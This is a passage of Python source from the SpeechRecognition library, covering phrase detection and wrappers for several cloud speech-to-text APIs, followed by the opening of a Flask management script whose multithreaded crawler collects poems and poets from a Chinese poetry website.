phrase_buffer_count = int(math.ceil(self.phrase_threshold / seconds_per_buffer)) # minimum number of buffers of speaking audio before we consider the speaking audio a phrase
non_speaking_buffer_count = int(math.ceil(self.non_speaking_duration / seconds_per_buffer)) # maximum number of buffers of non-speaking audio to retain before and after a phrase
# read audio input for phrases until there is a phrase that is long enough
elapsed_time = 0 # number of seconds of audio read
buffer = b"" # an empty buffer means that the stream has ended and there is no data left to read
while True:
frames = collections.deque()
# store audio input until the phrase starts
while True:
# handle waiting too long for phrase by raising an exception
elapsed_time += seconds_per_buffer
if timeout and elapsed_time > timeout:
raise WaitTimeoutError("listening timed out while waiting for phrase to start")
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
if len(frames) > non_speaking_buffer_count: # ensure we only keep the needed amount of non-speaking buffers
frames.popleft()
# detect whether speaking has started on audio input
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
if energy > self.energy_threshold: break
# dynamically adjust the energy threshold using asymmetric weighted average
if self.dynamic_energy_threshold:
damping = self.dynamic_energy_adjustment_damping ** seconds_per_buffer # account for different chunk sizes and rates
target_energy = energy * self.dynamic_energy_ratio
self.energy_threshold = self.energy_threshold * damping + target_energy * (1 - damping)
# read audio input until the phrase ends
pause_count, phrase_count = 0, 0
phrase_start_time = elapsed_time
while True:
# handle phrase being too long by cutting off the audio
elapsed_time += seconds_per_buffer
if phrase_time_limit and elapsed_time - phrase_start_time > phrase_time_limit:
break
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
phrase_count += 1
# check if speaking has stopped for longer than the pause threshold on the audio input
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # unit energy of the audio signal within the buffer
if energy > self.energy_threshold:
pause_count = 0
else:
pause_count += 1
if pause_count > pause_buffer_count: # end of the phrase
break
# check how long the detected phrase is, and retry listening if the phrase is too short
phrase_count -= pause_count # exclude the buffers for the pause before the phrase
if phrase_count >= phrase_buffer_count or len(buffer) == 0: break # phrase is long enough or we've reached the end of the stream, so stop listening
# obtain frame data
for i in range(pause_count - non_speaking_buffer_count): frames.pop() # remove extra non-speaking frames at the end
frame_data = b"".join(list(frames))
return AudioData(frame_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def listen_in_background(self, source, callback, phrase_time_limit=None):
"""
        Spawns a thread to repeatedly record phrases from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance and call ``callback`` with that ``AudioData`` instance as soon as each phrase is detected.
Returns a function object that, when called, requests that the background listener thread stop, and waits until it does before returning. The background thread is a daemon and will not stop the program from exiting if there are no other non-daemon threads.
Phrase recognition uses the exact same mechanism as ``recognizer_instance.listen(source)``. The ``phrase_time_limit`` parameter works in the same way as the ``phrase_time_limit`` parameter for ``recognizer_instance.listen(source)``, as well.
The ``callback`` parameter is a function that should accept two parameters - the ``recognizer_instance``, and an ``AudioData`` instance representing the captured audio. Note that ``callback`` function will be called from a non-main thread.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
running = [True]
def threaded_listen():
with source as s:
while running[0]:
try: # listen for 1 second, then check again if the stop function has been called
audio = self.listen(s, 1)
except WaitTimeoutError: # listening timed out, just try again
pass
else:
if running[0]: callback(self, audio)
def stopper():
running[0] = False
listener_thread.join() # block until the background thread is done, which can be up to 1 second
listener_thread = threading.Thread(target=threaded_listen)
listener_thread.daemon = True
listener_thread.start()
return stopper
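    # Illustrative usage sketch (not part of the library): a callback that prints
    # whatever the Sphinx recognizer (below) produces, ignoring unintelligible audio.
    #
    #     def on_phrase(recognizer, audio):
    #         try:
    #             print(recognizer.recognize_sphinx(audio))
    #         except UnknownValueError:
    #             pass
    #
    #     stop = r.listen_in_background(Microphone(), on_phrase)
    #     # ... do other work; phrases are delivered on a background thread ...
    #     stop()    # ask the listener thread to stop and wait for it to finish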
def recognize_sphinx(self, audio_data, language="en-US", keyword_entries=None, show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using CMU Sphinx.
        The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` or ``"en-GB"``, defaulting to US English. Out of the box, only ``en-US`` is supported. See `Notes on using PocketSphinx <https://github.com/Uberi/speech_recognition/blob/master/reference/pocketsphinx.rst>`__ for information about installing other languages. This document is also included under ``reference/pocketsphinx.rst``.
If specified, the keywords to search for are determined by ``keyword_entries``, an iterable of tuples of the form ``(keyword, sensitivity)``, where ``keyword`` is a phrase, and ``sensitivity`` is how sensitive to this phrase the recognizer should be, on a scale of 0 (very insensitive, more false negatives) to 1 (very sensitive, more false positives) inclusive. If not specified or ``None``, no keywords are used and Sphinx will simply transcribe whatever words it recognizes. Specifying ``keyword_entries`` is more accurate than just looking for those same keywords in non-keyword-based transcriptions, because Sphinx knows specifically what sounds to look for.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the Sphinx ``pocketsphinx.pocketsphinx.Decoder`` object resulting from the recognition.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if there are any issues with the Sphinx installation.
"""
assert isinstance(audio_data, AudioData), "``audio_data`` must be audio data"
assert isinstance(language, str), "``language`` must be a string"
assert keyword_entries is None or all(isinstance(keyword, (type(""), type(u""))) and 0 <= sensitivity <= 1 for keyword, sensitivity in keyword_entries), "``keyword_entries`` must be ``None`` or a list of pairs of strings and numbers between 0 and 1"
# import the PocketSphinx speech recognition module
try:
import pocketsphinx
except ImportError:
raise RequestError("missing PocketSphinx module: ensure that PocketSphinx is set up correctly.")
except ValueError:
raise RequestError("bad PocketSphinx installation detected; make sure you have PocketSphinx version 0.0.9 or better.")
language_directory = os.path.join(os.path.dirname(os.path.realpath(__file__)), "pocketsphinx-data", language)
if not os.path.isdir(language_directory):
raise RequestError("missing PocketSphinx language data directory: \"{}\"".format(language_directory))
acoustic_parameters_directory = os.path.join(language_directory, "acoustic-model")
if not os.path.isdir(acoustic_parameters_directory):
raise RequestError("missing PocketSphinx language model parameters directory: \"{}\"".format(acoustic_parameters_directory))
language_model_file = os.path.join(language_directory, "language-model.lm.bin")
if not os.path.isfile(language_model_file):
raise RequestError("missing PocketSphinx language model file: \"{}\"".format(language_model_file))
phoneme_dictionary_file = os.path.join(language_directory, "pronounciation-dictionary.dict")
if not os.path.isfile(phoneme_dictionary_file):
raise RequestError("missing PocketSphinx phoneme dictionary file: \"{}\"".format(phoneme_dictionary_file))
# create decoder object
config = pocketsphinx.Decoder.default_config()
config.set_string("-hmm", acoustic_parameters_directory) # set the path of the hidden Markov model (HMM) parameter files
config.set_string("-lm", language_model_file)
config.set_string("-dict", phoneme_dictionary_file)
config.set_string("-logfn", os.devnull) # disable logging (logging causes unwanted output in terminal)
decoder = pocketsphinx.Decoder(config)
# obtain audio data
raw_data = audio_data.get_raw_data(convert_rate=16000, convert_width=2) # the included language models require audio to be 16-bit mono 16 kHz in little-endian format
# obtain recognition results
if keyword_entries is not None: # explicitly specified set of keywords
with tempfile.NamedTemporaryFile("w") as f:
                # generate a keywords file - Sphinx documentation recommends sensitivities between 1e-50 and 1e-5
f.writelines("{} /1e{}/\n".format(keyword, 100 * sensitivity - 110) for keyword, sensitivity in keyword_entries)
f.flush()
                # perform the speech recognition with the keywords file (this is inside the context manager so the file isn't deleted until we're done)
decoder.set_kws("keywords", f.name)
decoder.set_search("keywords")
decoder.start_utt() # begin utterance processing
decoder.process_raw(raw_data, False, True) # process audio data with recognition enabled (no_search = False), as a full utterance (full_utt = True)
decoder.end_utt() # stop utterance processing
else: # no keywords, perform freeform recognition
decoder.start_utt() # begin utterance processing
decoder.process_raw(raw_data, False, True) # process audio data with recognition enabled (no_search = False), as a full utterance (full_utt = True)
decoder.end_utt() # stop utterance processing
if show_all: return decoder
# return results
hypothesis = decoder.hyp()
if hypothesis is not None: return hypothesis.hypstr
raise UnknownValueError() # no transcriptions available
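    # Hedged usage sketch (not part of the library API above): offline keyword spotting with ``recognize_sphinx``.
    # "command.wav" and the keyword sensitivities below are illustrative placeholders, not recommendations.
    #
    #     r = Recognizer()
    #     with AudioFile("command.wav") as source:
    #         audio = r.record(source)                  # read the entire file into an AudioData instance
    #     try:
    #         text = r.recognize_sphinx(audio, keyword_entries=[("stop", 0.8), ("go", 0.6)])
    #     except UnknownValueError:
    #         text = None                               # none of the keywords were detected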
def recognize_google(self, audio_data, key=None, language="en-US", show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Google Speech Recognition API.
The Google Speech Recognition API key is specified by ``key``. If not specified, it uses a generic key that works out of the box. This should generally be used for personal or testing purposes only, as it **may be revoked by Google at any time**.
        To obtain your own API key, simply follow the steps on the `API Keys <http://www.chromium.org/developers/how-tos/api-keys>`__ page at the Chromium Developers site. In the Google Developers Console, Google Speech Recognition is listed as "Speech API".
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language tags can be found in this `StackOverflow answer <http://stackoverflow.com/a/14302134>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the raw API response as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "``audio_data`` must be audio data"
assert key is None or isinstance(key, str), "``key`` must be ``None`` or a string"
assert isinstance(language, str), "``language`` must be a string"
flac_data = audio_data.get_flac_data(
convert_rate=None if audio_data.sample_rate >= 8000 else 8000, # audio samples must be at least 8 kHz
convert_width=2 # audio samples must be 16-bit
)
if key is None: key = "AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw"
url = "http://www.google.com/speech-api/v2/recognize?{}".format(urlencode({
"client": "chromium",
"lang": language,
"key": key,
}))
request = Request(url, data=flac_data, headers={"Content-Type": "audio/x-flac; rate={}".format(audio_data.sample_rate)})
# obtain audio transcription results
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
# ignore any blank blocks
actual_result = []
for line in response_text.split("\n"):
if not line: continue
result = json.loads(line)["result"]
if len(result) != 0:
actual_result = result[0]
break
# return results
if show_all: return actual_result
if not isinstance(actual_result, dict) or len(actual_result.get("alternative", [])) == 0: raise UnknownValueError()
# return alternative with highest confidence score
best_hypothesis = max(actual_result["alternative"], key=lambda alternative: alternative["confidence"])
if "transcript" not in best_hypothesis: raise UnknownValueError()
return best_hypothesis["transcript"]
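    # Hedged usage sketch (not part of the library API above): one-shot microphone transcription with the
    # built-in demo key. The error handling mirrors the exceptions documented in the docstring.
    #
    #     r = Recognizer()
    #     with Microphone() as source:
    #         audio = r.listen(source)
    #     try:
    #         print(r.recognize_google(audio, language="en-US"))
    #     except UnknownValueError:
    #         print("could not understand audio")
    #     except RequestError as e:
    #         print("recognition request failed: {}".format(e))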
def recognize_google_cloud(self, audio_data, credentials_json=None, language="en-US", preferred_phrases=None, show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Google Cloud Speech API.
This function requires a Google Cloud Platform account; see the `Google Cloud Speech API Quickstart <https://cloud.google.com/speech/docs/getting-started>`__ for details and instructions. Basically, create a project, enable billing for the project, enable the Google Cloud Speech API for the project, and set up Service Account Key credentials for the project. The result is a JSON file containing the API credentials. The text content of this JSON file is specified by ``credentials_json``. If not specified, the library will try to automatically `find the default API credentials JSON file <https://developers.google.com/identity/protocols/application-default-credentials>`__.
The recognition language is determined by ``language``, which is a BCP-47 language tag like ``"en-US"`` (US English). A list of supported language tags can be found in the `Google Cloud Speech API documentation <https://cloud.google.com/speech/docs/languages>`__.
If ``preferred_phrases`` is a list of phrase strings, those given phrases will be more likely to be recognized over similar-sounding alternatives. This is useful for things like keyword/command recognition or adding new phrases that aren't in Google's vocabulary. Note that the API imposes certain `restrictions on the list of phrase strings <https://cloud.google.com/speech/limits#content>`__.
Returns the most likely transcription if ``show_all`` is False (the default). Otherwise, returns the raw API response as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the credentials aren't valid, or if there is no Internet connection.
"""
assert isinstance(audio_data, AudioData), "``audio_data`` must be audio data"
        assert credentials_json is None or isinstance(credentials_json, str), "``credentials_json`` must be ``None`` or a string"
assert isinstance(language, str), "``language`` must be a string"
        assert preferred_phrases is None or all(isinstance(phrase, (type(""), type(u""))) for phrase in preferred_phrases), "``preferred_phrases`` must be a list of strings"
# See https://cloud.google.com/speech/reference/rest/v1beta1/RecognitionConfig
flac_data = audio_data.get_flac_data(
convert_rate=None if 8000 <= audio_data.sample_rate <= 48000 else max(8000, min(audio_data.sample_rate, 48000)), # audio sample rate must be between 8 kHz and 48 kHz inclusive - clamp sample rate into this range
convert_width=2 # audio samples must be 16-bit
)
try:
from oauth2client.client import GoogleCredentials
from googleapiclient.discovery import build
import googleapiclient.errors
if credentials_json is None:
api_credentials = GoogleCredentials.get_application_default()
else:
# the credentials can only be read from a file, so we'll make a temp file and write in the contents to work around that
with tempfile.NamedTemporaryFile("w") as f:
f.write(credentials_json)
f.flush()
api_credentials = GoogleCredentials.from_stream(f.name)
speech_service = build("speech", "v1beta1", credentials=api_credentials)
except ImportError:
raise RequestError("missing google-api-python-client module: ensure that google-api-python-client is set up correctly.")
if preferred_phrases is None:
speech_config = {"encoding": "FLAC", "sampleRate": audio_data.sample_rate, "languageCode": language}
else:
speech_config = {"encoding": "FLAC", "sampleRate": audio_data.sample_rate, "languageCode": language, "speechContext": {"phrases": preferred_phrases}}
request = speech_service.speech().syncrecognize(body={"audio": {"content": base64.b64encode(flac_data).decode("utf8")}, "config": speech_config})
try:
response = request.execute()
except googleapiclient.errors.HttpError as e:
raise RequestError(e)
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
if show_all: return response
if "results" not in response or len(response["results"]) == 0: raise UnknownValueError()
transcript = ""
for result in response["results"]:
transcript += result["alternatives"][0]["transcript"].strip() + " "
return transcript
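    # Hedged usage sketch (not part of the library API above): Google Cloud Speech with explicit credentials and
    # phrase hints. "gcp-credentials.json" and the phrase list are placeholders for your own project's values;
    # ``r`` and ``audio`` are assumed to exist as in the sketches above.
    #
    #     with open("gcp-credentials.json") as f:
    #         credentials_json = f.read()
    #     text = r.recognize_google_cloud(audio, credentials_json=credentials_json,
    #                                     preferred_phrases=["turn on", "turn off"])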
def recognize_wit(self, audio_data, key, show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Wit.ai API.
The Wit.ai API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://wit.ai/>`__ and creating an app. You will need to add at least one intent to the app before you can see the API key, though the actual intent settings don't matter.
To get the API key for a Wit.ai app, go to the app's overview page, go to the section titled "Make an API request", and look for something along the lines of ``Authorization: Bearer XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX``; ``XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`` is the API key. Wit.ai API keys are 32-character uppercase alphanumeric strings.
The recognition language is configured in the Wit.ai app settings.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://wit.ai/docs/http/20141022#get-intent-via-text-link>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "``key`` must be a string"
wav_data = audio_data.get_wav_data(
convert_rate=None if audio_data.sample_rate >= 8000 else 8000, # audio samples must be at least 8 kHz
convert_width=2 # audio samples should be 16-bit
)
url = "https://api.wit.ai/speech?v=20160526"
request = Request(url, data=wav_data, headers={"Authorization": "Bearer {}".format(key), "Content-Type": "audio/wav"})
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "_text" not in result or result["_text"] is None: raise UnknownValueError()
return result["_text"]
def recognize_bing(self, audio_data, key, language="en-US", show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Microsoft Bing Voice Recognition API.
The Microsoft Bing Voice Recognition API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://www.microsoft.com/cognitive-services/en-us/speech-api>`__ with Microsoft Cognitive Services.
To get the API key, go to the `Microsoft Cognitive Services subscriptions overview <https://www.microsoft.com/cognitive-services/en-us/subscriptions>`__, go to the entry titled "Speech", and look for the key under the "Keys" column. Microsoft Bing Voice Recognition API keys are 32-character lowercase hexadecimal strings.
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in the `API documentation <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#SupLocales>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-3-voice-recognition-responses>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "``key`` must be a string"
assert isinstance(language, str), "``language`` must be a string"
access_token, expire_time = getattr(self, "bing_cached_access_token", None), getattr(self, "bing_cached_access_token_expiry", None)
allow_caching = True
try:
from time import monotonic # we need monotonic time to avoid being affected by system clock changes, but this is only available in Python 3.3+
except ImportError:
try:
from monotonic import monotonic # use time.monotonic backport for Python 2 if available (from https://pypi.python.org/pypi/monotonic)
except (ImportError, RuntimeError):
expire_time = None # monotonic time not available, don't cache access tokens
allow_caching = False # don't allow caching, since monotonic time isn't available
if expire_time is None or monotonic() > expire_time: # caching not enabled, first credential request, or the access token from the previous one expired
# get an access token using OAuth
credential_url = "https://api.cognitive.microsoft.com/sts/v1.0/issueToken"
credential_request = Request(credential_url, data=b"", headers={
"Content-type": "application/x-www-form-urlencoded",
"Content-Length": "0",
"Ocp-Apim-Subscription-Key": key,
})
if allow_caching:
start_time = monotonic()
try:
credential_response = urlopen(credential_request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
access_token = credential_response.read().decode("utf-8")
if allow_caching:
# save the token for the duration it is valid for
self.bing_cached_access_token = access_token
self.bing_cached_access_token_expiry = start_time + 600 # according to https://www.microsoft.com/cognitive-services/en-us/Speech-api/documentation/API-Reference-REST/BingVoiceRecognition, the token expires in exactly 10 minutes
wav_data = audio_data.get_wav_data(
convert_rate=16000, # audio samples must be 8kHz or 16 kHz
convert_width=2 # audio samples should be 16-bit
)
url = "https://speech.platform.bing.com/recognize/query?{}".format(urlencode({
"version": "3.0",
"requestid": uuid.uuid4(),
"appID": "D4D52672-91D7-4C74-8AD8-42B1D98141A5",
"format": "json",
"locale": language,
"device.os": "wp7",
"scenarios": "ulm",
"instanceid": uuid.uuid4(),
"result.profanitymarkup": "0",
}))
request = Request(url, data=wav_data, headers={
"Authorization": "Bearer {}".format(access_token),
"Content-Type": "audio/wav; samplerate=16000; sourcerate={}; trustsourcerate=true".format(audio_data.sample_rate),
})
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "header" not in result or "lexical" not in result["header"]: raise UnknownValueError()
return result["header"]["lexical"]
def recognize_houndify(self, audio_data, client_id, client_key, show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Houndify API.
The Houndify client ID and client key are specified by ``client_id`` and ``client_key``, respectively. Unfortunately, these are not available without `signing up for an account <https://www.houndify.com/signup>`__. Once logged into the `dashboard <https://www.houndify.com/dashboard>`__, you will want to select "Register a new client", and fill in the form as necessary. When at the "Enable Domains" page, enable the "Speech To Text Only" domain, and then select "Save & Continue".
To get the client ID and client key for a Houndify client, go to the `dashboard <https://www.houndify.com/dashboard>`__ and select the client's "View Details" link. On the resulting page, the client ID and client key will be visible. Client IDs and client keys are both Base64-encoded strings.
Currently, only English is supported as a recognition language.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(client_id, str), "``client_id`` must be a string"
assert isinstance(client_key, str), "``client_key`` must be a string"
wav_data = audio_data.get_wav_data(
convert_rate=None if audio_data.sample_rate in [8000, 16000] else 16000, # audio samples must be 8 kHz or 16 kHz
convert_width=2 # audio samples should be 16-bit
)
url = "https://api.houndify.com/v1/audio"
user_id, request_id = str(uuid.uuid4()), str(uuid.uuid4())
request_time = str(int(time.time()))
request_signature = base64.urlsafe_b64encode(
hmac.new(
base64.urlsafe_b64decode(client_key),
user_id.encode("utf-8") + b";" + request_id.encode("utf-8") + request_time.encode("utf-8"),
hashlib.sha256
).digest() # get the HMAC digest as bytes
).decode("utf-8")
request = Request(url, data=wav_data, headers={
"Content-Type": "application/json",
"Hound-Request-Info": json.dumps({"ClientID": client_id, "UserID": user_id}),
"Hound-Request-Authentication": "{};{}".format(user_id, request_id),
"Hound-Client-Authentication": "{};{};{}".format(client_id, request_time, request_signature)
})
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "Disambiguation" not in result or result["Disambiguation"] is None:
raise UnknownValueError()
return result['Disambiguation']['ChoiceData'][0]['Transcription']
def recognize_ibm(self, audio_data, username, password, language="en-US", show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the IBM Speech to Text API.
The IBM Speech to Text username and password are specified by ``username`` and ``password``, respectively. Unfortunately, these are not available without `signing up for an account <https://console.ng.bluemix.net/registration/>`__. Once logged into the Bluemix console, follow the instructions for `creating an IBM Watson service instance <https://www.ibm.com/watson/developercloud/doc/getting_started/gs-credentials.shtml>`__, where the Watson service is "Speech To Text". IBM Speech to Text usernames are strings of the form XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX, while passwords are mixed-case alphanumeric strings.
The recognition language is determined by ``language``, an RFC5646 language tag with a dialect like ``"en-US"`` (US English) or ``"zh-CN"`` (Mandarin Chinese), defaulting to US English. The supported language values are listed under the ``model`` parameter of the `audio recognition API documentation <https://www.ibm.com/watson/developercloud/speech-to-text/api/v1/#sessionless_methods>`__, in the form ``LANGUAGE_BroadbandModel``, where ``LANGUAGE`` is the language value.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://www.ibm.com/watson/developercloud/speech-to-text/api/v1/#sessionless_methods>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(username, str), "``username`` must be a string"
assert isinstance(password, str), "``password`` must be a string"
flac_data = audio_data.get_flac_data(
convert_rate=None if audio_data.sample_rate >= 16000 else 16000, # audio samples should be at least 16 kHz
convert_width=None if audio_data.sample_width >= 2 else 2 # audio samples should be at least 16-bit
)
url = "https://stream.watsonplatform.net/speech-to-text/api/v1/recognize?{}".format(urlencode({
"profanity_filter": "false",
"continuous": "true",
"model": "{}_BroadbandModel".format(language),
}))
request = Request(url, data=flac_data, headers={
"Content-Type": "audio/x-flac",
"X-Watson-Learning-Opt-Out": "true", # prevent requests from being logged, for improved privacy
})
authorization_value = base64.standard_b64encode("{}:{}".format(username, password).encode("utf-8")).decode("utf-8")
request.add_header("Authorization", "Basic {}".format(authorization_value))
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "results" not in result or len(result["results"]) < 1 or "alternatives" not in result["results"][0]:
raise UnknownValueError()
transcription = []
for utterance in result["results"]:
if "alternatives" not in utterance: raise UnknownValueError()
for hypothesis in utterance["alternatives"]:
if "transcript" in hypothesis:
transcription.append(hypothesis["transcript"])
return "\n".join(transcription)
def get_flac_converter():
"""Returns the absolute path of a FLAC converter executable, or raises an OSError if none can be found."""
flac_converter = shutil_which("flac") # check for installed version first
if flac_converter is None: # flac utility is not installed
base_path = os.path.dirname(os.path.abspath(__file__)) # directory of the current module file, where all the FLAC bundled binaries are stored
system, machine = platform.system(), platform.machine()
if system == "Windows" and machine in {"i686", "i786", "x86", "x86_64", "AMD64"}:
flac_converter = os.path.join(base_path, "flac-win32.exe")
elif system == "Darwin" and machine in {"i686", "i786", "x86", "x86_64", "AMD64"}:
flac_converter = os.path.join(base_path, "flac-mac")
elif system == "Linux" and machine in {"i686", "i786", "x86"}:
flac_converter = os.path.join(base_path, "flac-linux-x86")
elif system == "Linux" and machine in {"x86_64", "AMD64"}:
flac_converter = os.path.join(base_path, "flac-linux-x86_64")
else: # no FLAC converter available
raise OSError("FLAC conversion utility not available - consider installing the FLAC command line application by running `apt-get install flac` or your operating system's equivalent")
# mark FLAC converter as executable if possible
try:
stat_info = os.stat(flac_converter)
os.chmod(flac_converter, stat_info.st_mode | stat.S_IEXEC)
except OSError: pass
return flac_converter
def shutil_which(pgm):
"""Python 2 compatibility: backport of ``shutil.which()`` from Python 3"""
path = os.getenv('PATH')
for p in path.split(os.path.pathsep):
p = os.path.join(p, pgm)
if os.path.exists(p) and os.access(p, os.X_OK):
return p
# ===============================
# backwards compatibility shims
# ===============================
WavFile = AudioFile # WavFile was renamed to AudioFile in 3.4.1
def recognize_api(self, audio_data, client_access_token, language="en", session_id=None, show_all=False):
wav_data = audio_data.get_wav_data(convert_rate=16000, convert_width=2)
url = "https://api.api.ai/v1/query"
while True:
boundary = uuid.uuid4().hex
if boundary.encode("utf-8") not in wav_data: break
if session_id is None: session_id = uuid.uuid4().hex
data = b"--" + boundary.encode("utf-8") + b"\r\n" + b"Content-Disposition: form-data; name=\"request\"\r\n" + b"Content-Type: application/json\r\n" + b"\r\n" + b"{\"v\": \"20150910\", \"sessionId\": \"" + session_id.encode("utf-8") + b"\", \"lang\": \"" + language.encode("utf-8") + b"\"}\r\n" + b"--" + boundary.encode("utf-8") + b"\r\n" + b"Content-Disposition: form-data; name=\"voiceData\"; filename=\"audio.wav\"\r\n" + b"Content-Type: audio/wav\r\n" + b"\r\n" + wav_data + b"\r\n" + b"--" + boundary.encode("utf-8") + b"--\r\n"
request = Request(url, data=data, headers={"Authorization": "Bearer {}".format(client_access_token), "Content-Length": str(len(data)), "Expect": "100-continue", "Content-Type": "multipart/form-data; boundary={}".format(boundary)})
try: response = urlopen(request, timeout=10)
except HTTPError as e: raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e: raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
if show_all: return result
if "status" not in result or "errorType" not in result["status"] or result["status"]["errorType"] != "success":
raise UnknownValueError()
return result["result"]["resolvedQuery"]
Recognizer.recognize_api = classmethod(recognize_api) # API.AI Speech Recognition is deprecated/not recommended as of 3.5.0, and currently is only optionally available for paid plans
|
manages.py
|
# -*- coding: UTF-8 -*-
__author__ = 'Joynice'
import queue
import re
import threading
import requests
from faker import Faker
from flask_migrate import Migrate, MigrateCommand
from flask_script import Manager
from lxml import etree
from app import create_app
from exts import db
from models import Poem, Poet
user_agent = Faker('zh-CN').user_agent()
app = create_app()
manager = Manager(app)
Migrate(app, db)
manager.add_command('db', MigrateCommand)
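# Usage note (not part of the original script): with flask_script/flask_migrate wired up above, the script is
# typically driven from the command line, e.g. (assuming this file is saved as manages.py, as in this repo):
#     python manages.py db init && python manages.py db migrate && python manages.py db upgrade
#     python manages.py spider        # run the crawler command defined below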
def get_header():
return {
'User-Agent': user_agent,
'Connection': 'close'
}
# Multi-threaded crawl; note that it may fetch incomplete data. The full corpus holds roughly 200,000+ poems.
@manager.command
def spider():
class Shici(object):
def __init__(self, thread=5):
            self.poet_queue = queue.Queue()  # queue of poet page URLs
self.thread = thread
self.base_url = 'http://www.shicimingju.com'
def get_poet_url(self):
for i in range(1, 13054):
url = 'http://www.shicimingju.com/chaxun/zuozhe/{}.html'.format(i)
self.poet_queue.put(url)
def Spider(self):
while not self.poet_queue.empty():
url = self.poet_queue.get()
req = requests.get(url, headers=get_header())
if req.status_code == 200:
req.encoding = 'utf-8'
html = etree.HTML(req.text)
name = html.xpath('/html/body/div[4]/div[2]/div[1]/div[2]/div[1]/h4/a/text()')[0]
